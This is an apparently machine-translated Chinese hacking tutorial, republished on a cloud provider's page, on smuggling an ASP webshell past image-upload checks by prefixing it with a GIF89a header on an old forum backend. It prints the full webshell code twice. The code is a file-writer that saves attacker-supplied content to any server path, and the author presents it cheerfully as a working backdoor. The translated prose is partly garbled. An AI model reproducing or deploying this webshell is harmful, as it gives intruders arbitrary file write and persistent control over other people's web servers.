Gif89a is integrated with the dynamic network backend (before 7.1) to get a complete explanation of webshell

Last Update:2018-12-05 Source: Internet

Author: User

Tags servervariables

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Nethacking Source: http://www.powers.com.cn Author: Love sorrow

Background:
(1) upload files online and back up the files to obtain Backdoors
(2) gif89a can be used to upload a GIF image with Trojan Horse content: escape the picture upload detection.
Therefore, a new method is created: Upload the GIF Avatar image and back up the Trojan. (Use range: versions earlier than 7.1)

However, many people cannot display a picture after executing a backdoor.

I will announce the more convenient method that I have used for a long time, and explain why this problem occurs .:
Gif89a and webmaster assistant. When the webshell is run, you can see the webmaster assistant interface. The only difference is that gif89a is added in the upper left corner. This method is used for testing in a forum as soon as you see the background (2 .. Haha

The GIF content is as follows:
----- The following is the content of the GIF image (gif89a contains the content of the webmaster assistant, so you don't need to read more )----
Gif89a
<%
'Webmaster assistant content... omitted...
%>
</Body>
</Center>
----- The above is the GIF image content (gif89a below is the content of the webmaster assistant, do not read more )----

The real problem is:
Execute the ASP file recovered from the GIF file, and finally display an image that cannot be displayed:
In fact, there are two processes:
(1) Asp interpretation execution
(2) display in your browser.
(1) There is no problem.
Now the problem lies in your (2.
(2) the cause of the problem is the explanation of the browser.
Solution: place the displayed code between <body> </body>.
This is the case: An undisplayed image is displayed after execution.
Gif89a
<% Dim objfso %>
<% Dim fdata %>
<% Dim objcountfile %>
<% On error resume next %>
<% Set objfso = server. Createobject ("scripting. FileSystemObject") %>
<% If trim (Request ("syfdpath") <> "" Then %>
<% Fdata = request ("cyfddata") %>
<% Set objcountfile = objfso. createtextfile (Request ("syfdpath"), true) %>
<% Objcountfile. Write fdata %>
<% If err = 0 then %>
<% Response. Write "<font color = Red> Save success! </Font> "%>
<% Else %>
<% Response. Write "<font color = Red> Save unsuccess! </Font> "%>
<% End if %>
<% Err. Clear %>
<% End if %>
<% Objcountfile. Close %>
<% Set objcountfile = nothing %>
<% Set objfso = nothing %>
<% Response. Write "<form action ='' method = post> "%>
<% Response. Write "<font color = Red> absolute path of the file to be saved (including file name: such as D:/web/X. asp): </font>" %>
<% Response. Write "<input type = text name = syfdpath width = 32 size = 50>" %>
<% Response. Write "<br>" %>
<% Response. Write "absolute path of this file" %>
<% = Server. mappath (request. servervariables ("script_name") %>
<% Response. Write "<br>" %>
<% Response. Write "content of the input horse:" %>
<% Response. Write "<textarea name = cyfddata Cols = 80 rows = 10 width = 32> </textarea>" %>
<% Response. Write "<input type = submit value = save>" %>
<% Response. Write "</form>" %>

After modification: The operation is normal .. The backdoor is used normally .. Haha

Gif89a
<Body>
<% Dim objfso %>
<% Dim fdata %>
<% Dim objcountfile %>
<% On error resume next %>
<% Set objfso = server. Createobject ("scripting. FileSystemObject") %>
<% If trim (Request ("syfdpath") <> "" Then %>
<% Fdata = request ("cyfddata") %>
<% Set objcountfile = objfso. createtextfile (Request ("syfdpath"), true) %>
<% Objcountfile. Write fdata %>
<% If err = 0 then %>
<% Response. Write "<font color = Red> Save success! </Font> "%>
<% Else %>
<% Response. Write "<font color = Red> Save unsuccess! </Font> "%>
<% End if %>
<% Err. Clear %>
<% End if %>
<% Objcountfile. Close %>
<% Set objcountfile = nothing %>
<% Set objfso = nothing %>
<% Response. Write "<form action ='' method = post> "%>
<% Response. Write "<font color = Red> absolute path of the file to be saved (including file name: such as D:/web/X. asp): </font>" %>
<% Response. Write "<input type = text name = syfdpath width = 32 size = 50>" %>
<% Response. Write "<br>" %>
<% Response. Write "absolute path of this file" %>
<% = Server. mappath (request. servervariables ("script_name") %>
<% Response. Write "<br>" %>
<% Response. Write "content of the input horse:" %>
<% Response. Write "<textarea name = cyfddata Cols = 80 rows = 10 width = 32> </textarea>" %>
<% Response. Write "<input type = submit value = save>" %>
<% Response. Write "</form>" %>
</Body>

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More